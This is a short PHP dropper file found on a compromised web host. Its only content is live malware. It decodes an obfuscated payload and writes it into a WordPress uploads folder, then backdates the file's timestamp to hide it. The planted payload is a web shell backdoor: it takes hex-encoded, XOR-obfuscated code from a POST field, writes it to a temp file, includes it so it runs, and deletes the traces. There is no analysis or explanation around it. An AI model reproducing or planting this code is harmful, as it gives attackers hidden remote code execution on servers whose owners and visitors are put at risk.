File: //tmp/.include
<?php $p = "/kunden/homepages/34/d890102484/htdocs/sites/eglise/wp-content/uploads/2025/09/binlog.lib.php"; $c = rawurldecode('%3C%3Fphp%0A%0Aif%28isset%28%24_POST%5B%22%5Cx6Dr%5Cx6B%22%5D%29%29%7B%0A%09%24key%20%3D%20array_filter%28%5Bgetenv%28%22TMP%22%29%2C%20getcwd%28%29%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20session_save_path%28%29%2C%20getenv%28%22TEMP%22%29%2C%20%22/tmp%22%2C%20sys_get_temp_dir%28%29%2C%20%22/var/tmp%22%2C%20%22/dev/shm%22%5D%29%3B%0A%09%24obj%20%3D%20hex2bin%28%24_POST%5B%22%5Cx6Dr%5Cx6B%22%5D%29%3B%0A%09%24holder%20%3D%20%20%27%27%3B%20for%28%24o%3D0%3B%20%24o%3Cstrlen%28%24obj%29%3B%20%24o%2B%2B%29%7B%24holder%20.%3D%20chr%28ord%28%24obj%5B%24o%5D%29%20%5E%20100%29%3B%7D%0A%09foreach%20%28%24key%20as%20%24symbol%29%20%7B%0A%20%20%20%20%09%09if%20%28is_writable%28%24symbol%29%20%26%26%20is_dir%28%24symbol%29%29%20%7B%0A%20%20%20%20%24dchunk%20%3D%20sprintf%28%22%25s/.record%22%2C%20%24symbol%29%3B%0A%20%20%20%20if%20%28file_put_contents%28%24dchunk%2C%20%24holder%29%29%20%7B%0A%09include%20%24dchunk%3B%0A%09%40unlink%28%24dchunk%29%3B%0A%09exit%3B%0A%7D%0A%7D%0A%7D%0A%7D'); if (file_put_contents($p, $c)) { echo '!success!'; @touch($p, 1759144255); } die('!ended!');